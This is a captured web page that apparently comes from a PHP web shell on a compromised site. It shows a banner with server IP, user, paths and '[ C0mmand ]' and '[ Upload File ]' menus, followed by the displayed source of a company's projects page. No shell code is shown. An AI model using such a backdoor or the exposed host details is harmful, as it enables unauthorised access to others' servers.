Server IP : 103.53.40.154 / Your IP : 18.222.182.249 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/automationpowersolutions.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<head> <?php include 'headlink.php';?> </head> <?php include 'header.php';?> <section> <!-- Page Title --> <section class="page-title" style="background-image: url(images/background/9.jpg)"> <div class="auto-container"> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li><a href="#">Projects</a></li> </ul> <h2>Projects</h2> </div> </section> <!-- End Page Title --> <!-- Project Page Section --> <div class="project-page-section"> <div class="pattern-layer" style="background-image:url(images/background/pattern-25.png)"></div> <div class="auto-container"> <div class="sec-title alternate centered"> <h2>On-Going Projects</h2> </div> <!-- MixitUp Galery --> <div class="mixitup-gallery"> <!-- Filter --> <!--<div class="filters clearfix">--> <!-- <ul class="filter-tabs filter-btns text-center clearfix">--> <!-- <li class="active filter" data-role="button" data-filter="all">View All</li>--> <!-- <li class="filter" data-role="button" data-filter=".gas">Oil & Gas Engineering</li>--> <!-- <li class="filter" data-role="button" data-filter=".petroleum">Petroleum Engineering</li>--> <!-- <li class="filter" data-role="button" data-filter=".agricultural">Agricultural Automation</li>--> <!-- </ul>--> <!--</div>--> <div class="filter-list row clearfix"> <?php include_once('admin/config.php'); $sql = "SELECT * FROM `tb_project` WHERE m_id = 'On-Going'"; $run = mysqli_query($db,$sql) or die("Query Not run"); while($data = mysqli_fetch_assoc($run)){ ?> <!-- Project Block Two --> <div class="project-block-two mix all col-lg-6 col-md-6 col-sm-12"> <div class="inner-box"> <div class="image"> <img src="images/gallery/<?php echo $data['image']?>" alt="" /> <div class="overlay-box"> <a class="plus flaticon-plus" href="project-detail.php?id=<?php echo $data['id']?>"></a> <div class="content"> <!--<div class="title">Agreculture Automation</div>--> <h4><a href="project-detail.php?id=<?php echo $data['id']?>"><?php echo $data['title']?></a></h4> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <div class="container"> <div class="sec-title centered"> <h2>Completed Projects</h2> </div> <div class="filter-list row clearfix"> <?php include_once('admin/config.php'); $sql1 = "SELECT * FROM `tb_project` WHERE m_id = 'Completed'"; $run1 = mysqli_query($db,$sql1) or die("Query Not run"); while($data1 = mysqli_fetch_assoc($run1)){ ?> <!-- Project Block Two --> <div class="project-block-two mix all col-lg-6 col-md-6 col-sm-12"> <div class="inner-box"> <div class="image"> <img src="images/gallery/<?php echo $data1['image']?>" alt="" /> <div class="overlay-box"> <a class="plus flaticon-plus" href="project-detail.php?id=<?php echo $data1['id']?>"></a> <div class="content"> <!--<div class="title">Agreculture Automation</div>--> <h4><a href="project-detail.php?id=<?php echo $data1['id']?>"><?php echo $data1['title']?></a></h4> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <div class="container"> <div class="sec-title centered"> <h2>Trunkey Projects Projects</h2> </div> <div class="filter-list row clearfix"> <?php include_once('admin/config.php'); $sql2 = "SELECT * FROM `tb_project` WHERE m_id = 'Trunkey'"; $run2 = mysqli_query($db,$sql2) or die("Query Not run"); while($data2 = mysqli_fetch_assoc($run2)){ ?> <!-- Project Block Two --> <div class="project-block-two mix all col-lg-6 col-md-6 col-sm-12"> <div class="inner-box"> <div class="image"> <img src="images/gallery/<?php echo $data2['image']?>" alt="" /> <div class="overlay-box"> <a class="plus flaticon-plus" href="project-detail.php?id=<?php echo $data2['id']?>"></a> <div class="content"> <!--<div class="title">Agreculture Automation</div>--> <h4><a href="project-detail.php?id=<?php echo $data2['id']?>"><?php echo $data2['title']?></a></h4> </div> </div> </div> </div> </div> <?php } ?> <!-- Project Block Two --> <!--<div class="project-block-two mix all agricultural col-lg-6 col-md-6 col-sm-12">--> <!-- <div class="inner-box">--> <!-- <div class="image">--> <!-- <img src="images/gallery/IMG20.jpg" alt="" />--> <!-- <div class="overlay-box">--> <!-- <a class="plus flaticon-plus" href="project-detail.php"></a>--> <!-- <div class="content">--> <!--<div class="title">Agreculture Automation</div>--> <!-- <h4><a href="project-detail.php">: Erection & Commissioning of Storage Tanks & Chemical Dosing Systems at 3 x 660MW, Chatra, Jharkhand </a></h4>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!--</div>--> <!-- Project Block Two --> <!--<div class="project-block-two mix all agricultural gas col-lg-6 col-md-6 col-sm-12">--> <!-- <div class="inner-box">--> <!-- <div class="image">--> <!-- <img src="images/gallery/6.jpg" alt="" />--> <!-- <div class="overlay-box">--> <!-- <a class="plus flaticon-plus" href="project-detail.php"></a>--> <!-- <div class="content">--> <!--<div class="title">Agreculture Automation</div>--> <!-- <h4><a href="project-detail.php">Supply of consumable Items , Bhubaneshwar, Orissa</a></h4>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!--</div>--> <!-- Project Block Two --> <!--<div class="project-block-two mix all petroleum gas col-lg-6 col-md-6 col-sm-12">--> <!-- <div class="inner-box">--> <!-- <div class="image">--> <!-- <img src="images/gallery/IMG23.jpg" alt="" />--> <!-- <div class="overlay-box">--> <!-- <a class="plus flaticon-plus" href="project-detail.php"></a>--> <!-- <div class="content">--> <!--<div class="title">Agreculture Automation</div>--> <!-- <h4><a href="project-detail.php">Supply of High Pressure Vessel of CO2 & Argon Gas at Pantnagar, Haridwar</a></h4>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!--</div>--> <!-- Project Block Two --> <!--<div class="project-block-two mix all petroleum gas col-lg-6 col-md-6 col-sm-12">--> <!-- <div class="inner-box">--> <!-- <div class="image">--> <!-- <img src="images/gallery/IMG204.jpg" alt="" />--> <!-- <div class="overlay-box">--> <!-- <a class="plus flaticon-plus" href="project-detail.php"></a>--> <!-- <div class="content">--> <!--<div class="title">Agreculture Automation</div>--> <!-- <h4><a href="project-detail.php">Supply of 10 nm3 Nitrogen gas generator at Satna, M.P</a></h4>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!--</div>--> </div> </div> </div> </div> <!-- End Project Page Section --> </section> <!-- End Welcome Section --> <script src="js/jquery.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.mCustomScrollbar.concat.min.js"></script> <script src="js/magnific-popup.min.js"></script> <script src="js/appear.js"></script> <script src="js/parallax.min.js"></script> <script src="js/tilt.jquery.min.js"></script> <script src="js/jquery.paroller.min.js"></script> <script src="js/owl.js"></script> <script src="js/wow.js"></script> <script src="js/mixitup.js"></script> <script src="js/odometer.js"></script> <script src="js/slick.js"></script> <script src="js/backToTop.js"></script> <script src="js/jquery-ui.js"></script> <script src="js/cursor-script.js"></script> <script src="js/script.js"></script> <?php include 'footer2.php';?>